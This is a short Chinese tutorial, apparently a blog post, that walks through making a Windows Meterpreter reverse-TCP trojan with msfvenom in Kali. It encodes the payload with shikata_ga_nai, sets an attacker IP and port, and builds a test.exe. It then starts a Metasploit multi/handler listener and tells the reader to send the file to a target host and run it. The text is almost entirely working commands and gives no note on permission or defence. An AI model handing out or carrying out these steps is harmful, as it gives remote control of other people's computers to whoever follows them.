简介
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
生成
首先我们打开kali,打开一个终端
输入下面的命令并按下回车进行生成:
msfvenom -p windows/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=5555 -f exe > ./test.exeLHOST=192.168.1.106 此步是设置攻击者IP地址
LPORT=5555 此步是设置木马将会主动连接攻击者设定的监听端口
test.exe 木马名称
生成完成后打开你存放的目录,我这里是root的根目录
然后将这个文件发送到目标主机(先别急着运行)
设置监听
现在我们回到kali中,在终端中启动msf(启动命令:msfconsole)
启动完成后下面开始设置监听
依次输入下面命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 5555
exploitset LHOST 192.168.1.106 后面的ip地址是kali的ip
获取kal ip的方法:在终端输入ifconfig
set LPORT 5555 监听端口
下面就是监听状态
一切准备就绪现在可以去运行目标主机的那个msf文件
好了此教程就到这里了
评论 (0)